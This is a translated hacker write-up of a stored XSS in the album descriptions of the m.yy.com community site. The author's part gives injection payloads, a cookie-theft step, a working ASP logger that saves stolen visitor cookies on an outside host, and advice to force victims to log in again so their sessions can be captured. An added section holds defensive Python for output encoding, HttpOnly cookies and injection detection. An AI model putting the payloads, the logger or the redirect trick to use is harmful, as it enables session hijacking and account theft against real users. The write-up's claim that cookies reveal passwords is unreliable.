Author: B0mbErM@n
The vulnerability has been submitted to the official website a few days ago and has been fixed. For more information, see the figure below.
-
Introduction:
A stored XSS is possible through the album function of YY community (m.yy.com).
The same technique is used in many places to obtain and store the valid cookies of visitors.
-
Verify XSS:
Log on to m.yy.com and register an account. After registering, you have your own YY space.
Click Open album > Upload photo > open the photo after upload > Edit description > insert the XSS statement.
The most basic XSS statement: <script>alert(/B0mbErM@n/)</script>
After saving, a dialog box pops up showing /B0mbErM@n/, which confirms the injection. We can move on to the next verification.
-
Deep verification XSS:
Edit the description to <script>alert(document.cookie)</script>.
In this pop-up window, the cookie value will display username, password, and other information.
-
Use XSS to store cookies:
Insert the XSS statement <script>document.write();</script>
Here B0mberM@n.asp is a file and "website" is the host it sits on; the asp file has to be placed on a website that is reachable from the XSS page. When a visitor opens the page containing the XSS, the asp program is executed and no prompt box is displayed, so the action stays hidden.
-
B0mberM@n.asp program code:
<%
' Read the raw query string sent by the XSS payload (this is where the cookie arrives)
msg = Request.ServerVariables("QUERY_STRING")
' Log file lives next to the asp page
testfile = Server.MapPath("B0mberM@n.txt")
Set fs = Server.CreateObject("Scripting.FileSystemObject")
' 8 = ForAppending, True = create the file if it does not exist, 0 = ASCII
Set thisfile = fs.OpenTextFile(testfile, 8, True, 0)
thisfile.WriteLine("" & msg & "")
thisfile.Close
Set fs = Nothing
%>
Note: the file B0mberM@n.txt in the program directory stores each recorded msg (the query string received).
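The root cause in the steps above is that the album description is written into the page unencoded, and the impact is amplified because the session cookie is readable from document.cookie. The following is an added example (my own code, not from the original post or from YY) showing the two defensive controls a site like this needs: HTML-encoding the description on output, and issuing the session cookie with HttpOnly so script cannot read it. It also includes a coarse triage check over stored descriptions that a defender can run over existing album data. The sample descriptions, the cookie name "sid" and the function names are constructed for the example.

```python
"""Added defender-side example for the stored XSS described in the post.

Not code from the original post or from YY: it shows how the album
"description" field should be encoded on output, how a session cookie
should be issued so document.cookie does not expose it, and a simple
heuristic for flagging stored descriptions that look like injection.
"""
import html
import re
from http.cookies import SimpleCookie

# Constructed sample descriptions, including the payloads quoted in the post.
SAMPLE_DESCRIPTIONS = [
    "Holiday photo from the beach",
    "<script>alert(/B0mbErM@n/)</script>",
    "<script>alert(document.cookie)</script>",
    '<img src="x" onerror="alert(1)">',
]

# Coarse heuristic for triage only: script tags, inline event handlers,
# javascript: URLs. Output encoding, not this filter, is the actual fix.
SCRIPT_PATTERN = re.compile(
    r"<\s*script\b|\bon[a-z]+\s*=|javascript:", re.IGNORECASE
)


def render_description(raw: str) -> str:
    """Output-encode the description before inserting it into HTML.

    With this in place the stored payload is displayed as literal text
    instead of being executed by the visitor's browser.
    """
    return html.escape(raw, quote=True)


def render_album_page(descriptions) -> str:
    """Build the album fragment with every description encoded."""
    return "\n".join(
        f'<p class="desc">{render_description(d)}</p>' for d in descriptions
    )


def is_suspicious_description(raw: str) -> bool:
    """Flag descriptions that look like script injection (detection aid)."""
    return bool(SCRIPT_PATTERN.search(raw))


def flag_suspicious(descriptions) -> list:
    """Return the indices of descriptions worth a manual look."""
    return [i for i, d in enumerate(descriptions) if is_suspicious_description(d)]


def build_session_cookie(name: str, value: str) -> str:
    """Issue the session cookie with HttpOnly and Secure.

    HttpOnly means document.cookie in an injected script no longer returns
    the session value, which is what the post's payload depends on.
    """
    c = SimpleCookie()
    c[name] = value
    c[name]["httponly"] = True
    c[name]["secure"] = True
    c[name]["path"] = "/"
    return c[name].OutputString()


if __name__ == "__main__":
    print(render_album_page(SAMPLE_DESCRIPTIONS))
    print("suspicious indices:", flag_suspicious(SAMPLE_DESCRIPTIONS))
    print("Set-Cookie:", build_session_cookie("sid", "constructed-session-value"))
```

The encoding is applied at output time (in render_description) rather than at upload time, so the original text is preserved in storage and every rendering path gets the same protection; the regex is only a triage aid for finding descriptions that were stored before the fix.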
-
Further expansion:
Of course, the user may not be logged in when visiting our XSS page. To make them log in and then visit it again, we can add an automatic redirect to the login page at the end of B0mbErM@n.asp; the other party will instinctively log in and open the page containing the XSS statement again, and then we get the visitor's cookie. (There is plenty of automatic redirect code for ASP; no example is given here. You will find more, better and more detailed code on Google.)